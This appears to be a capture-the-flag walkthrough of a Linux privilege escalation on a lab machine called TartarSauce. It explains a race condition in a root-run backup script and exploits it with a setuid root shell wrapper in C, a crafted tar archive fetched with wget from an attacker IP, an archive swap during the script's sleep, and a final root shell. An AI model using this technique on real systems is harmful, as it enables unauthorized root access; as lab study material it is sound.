9 privesc omuna > root

# pspy shows
2021/09/22 17:09:31 CMD: UID=0    PID=5730   | /bin/bash /usr/sbin/backuperer

# looking at the script 
We can see that the script does – more or less – the following:
1. Removes dot files from /var/tmp, plus the /var/tmp/check folder.
2. Zips/archives the contents of /var/www/html as user onuma into a file in /var/tmp with a random name beginning with a dot.
3. Sleeps for 30 seconds
4. Creates the directory /var/tmp/check
5. Extracts the previously archived contents as root into the /var/tmp/check directory
6. Performs a diff against /var/www/html vs. /var/tmp/check/var/www/html
7. If the check in 6. reports differences, it just writes an error log, but leaves the files. If no differences are reported or if the diff command errors out (as, for example, the directory doesn’t exit), it moves the archive file into /var/backups and then removes the /var/tmp/check directory and dot file

If we are able to replace the tar gzipped file with our own malicious one in the timeframe of step 3 (sleep 30), include in our own tar.gz an executable with setuid bit set and owner root, plus leave the directory structure intact (as we want a successful diff (no error) that reports differences), tar should extract (and keep permissions/attributes) and the script should not move/delete any file. After that we could then enter the check directory and execute our file to get a root shell.

# exploit.c
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

$ gcc -m32 exploit.c -o exploit

# needs to be owned by root as target will think the file is owned by root
$ sudo chown root:root exploit
$ sudo chmod +s exploit

# make the dir structure
$ mkdir -p var/www/html
$ mv exploit var/www/html
$ tar -zcvf exploit.tar.gz var
var/
var/www/
var/www/html/
var/www/html/exploit

# donwload file where the .<random> file is created
onuma@TartarSauce:/var/tmp$ wget 10.10.16.5/exploit.tar.gz

onuma@TartarSauce:/var/tmp$ ll
total 2216
drwxrwxrwt 10 root  root     4096 Sep 22 17:44 ./
drwxr-xr-x 14 root  root     4096 Feb  9  2018 ../
-rw-r--r--  1 onuma onuma 2224128 Sep 22 17:44 .90e7643302fce3d4b68759541125b78fa0785a29
-rw-r--r--  1 onuma onuma    2640 Sep 22 17:39 exploit.tar.gz

# change exploit to .<file>
onuma@TartarSauce:/var/tmp$ mv exploit.tar.gz .90e7643302fce3d4b68759541125b78fa0

# wait until we see the check folder
onuma@TartarSauce:/var/tmp$ ll
total 48
drwxrwxrwt 11 root  root  4096 Sep 22 17:44 ./
drwxr-xr-x 14 root  root  4096 Feb  9  2018 ../
-rw-r--r--  1 onuma onuma 2640 Sep 22 17:39 .90e7643302fce3d4b68759541125b78fa0785a29
drwxr-xr-x  3 root  root  4096 Sep 22 17:44 check/

# in the check/var/www/html/, we have our exploit with setuid bit
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls -la
total 24
drwxr-xr-x 2 onuma onuma  4096 Sep 22 17:38 .
drwxr-xr-x 3 onuma onuma  4096 Sep 22 17:38 ..
-rwsr-xr-x 1 root  root  15100 Sep 22 17:36 exploit

onuma@TartarSauce:/var/tmp/check/var/www/html$ ./exploit
root@TartarSauce:/var/tmp/check/var/www/html# whoami;id;hostname
root
uid=0(root) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
TartarSauce